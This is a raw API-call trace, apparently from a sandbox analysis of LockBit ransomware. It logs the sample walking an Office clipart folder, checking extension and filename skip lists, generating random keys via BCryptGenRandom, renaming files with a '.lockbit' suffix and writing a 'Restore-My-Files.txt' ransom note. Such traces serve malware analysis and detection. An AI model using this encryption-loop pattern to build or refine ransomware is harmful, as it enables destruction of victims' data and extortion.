lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0121.393] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0121.393] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099163.WMF") returned 1 [0121.394] lstrcmpiW (lpString1="ntldr", lpString2="J0099163.WMF") returned 1 [0121.394] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099163.WMF") returned 1 [0121.394] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099163.WMF") returned -1 [0121.394] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099163.WMF") returned -1 [0121.394] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099163.WMF") returned 1 [0121.394] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099163.WMF") returned -1 [0121.394] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.394] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF") returned=".WMF" [0121.394] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0121.394] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0121.394] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0121.395] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0121.395] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0121.395] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0121.395] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0121.395] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0121.395] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0121.395] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0121.395] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0121.395] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0121.395] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0121.395] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0121.395] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0121.395] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF.lockbit") returned 72 [0121.395] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0121.396] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.396] malloc (_Size=0x40068) returned 0x1ff1e60 [0121.396] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=22356) returned 1 [0121.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0121.397] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0121.397] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.402] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.402] malloc (_Size=0xa6) returned 0x77d7a8 [0121.402] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.438] free (_Block=0x77d7a8) [0121.438] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.438] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.438] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.438] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x55ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099164.WMF", cAlternateFileName="")) returned 1 [0121.438] lstrcmpiW (lpString1=".", lpString2="J0099164.WMF") returned -1 [0121.438] lstrcmpiW (lpString1="..", lpString2="J0099164.WMF") returned -1 [0121.438] PathFindExtensionW (pszPath="J0099164.WMF") returned=".WMF" [0121.438] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0121.438] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0121.438] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0121.438] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0121.438] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0121.438] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0121.438] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0121.438] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0121.438] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0121.438] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0121.438] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0121.439] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0121.439] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099164.WMF") returned 1 [0121.440] lstrcmpiW (lpString1="ntldr", lpString2="J0099164.WMF") returned 1 [0121.440] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099164.WMF") returned 1 [0121.440] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099164.WMF") returned -1 [0121.440] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099164.WMF") returned -1 [0121.440] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099164.WMF") returned 1 [0121.440] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099164.WMF") returned -1 [0121.440] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.440] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF") returned=".WMF" [0121.440] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0121.440] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0121.440] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0121.441] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0121.441] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF.lockbit") returned 72 [0121.441] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099164.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0121.443] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.443] malloc (_Size=0x40068) returned 0x1ff1e60 [0121.443] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=21946) returned 1 [0121.443] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.444] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0121.444] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.444] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0121.445] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0121.549] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.549] malloc (_Size=0xa6) returned 0x77d7a8 [0121.549] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.783] free (_Block=0x77d7a8) [0121.783] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.783] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.783] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.783] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0xc53a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099165.JPG", cAlternateFileName="")) returned 1 [0121.783] lstrcmpiW (lpString1=".", lpString2="J0099165.JPG") returned -1 [0121.783] lstrcmpiW (lpString1="..", lpString2="J0099165.JPG") returned -1 [0121.783] PathFindExtensionW (pszPath="J0099165.JPG") returned=".JPG" [0121.783] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.784] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.784] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.784] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.784] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.784] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.784] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.784] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.784] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.784] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.784] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.785] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.785] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.785] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.785] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.785] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.785] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.785] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.785] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.785] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.785] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.785] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.786] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.786] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.786] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.786] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.786] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.786] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.786] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.786] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.786] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.786] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099165.JPG") returned 1 [0121.786] lstrcmpiW (lpString1="ntldr", lpString2="J0099165.JPG") returned 1 [0121.787] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099165.JPG") returned 1 [0121.787] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099165.JPG") returned -1 [0121.787] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099165.JPG") returned -1 [0121.787] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099165.JPG") returned 1 [0121.787] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099165.JPG") returned -1 [0121.787] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.787] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned=".JPG" [0121.787] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.787] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.787] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.787] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.787] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.787] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.787] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.788] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.788] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.788] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.788] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.788] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.788] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.788] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.788] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.788] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.788] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG.lockbit") returned 72 [0121.788] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0121.789] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.789] malloc (_Size=0x40068) returned 0x3df0008 [0121.789] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=50490) returned 1 [0121.789] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.790] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0121.790] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.791] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0121.796] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0121.807] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft 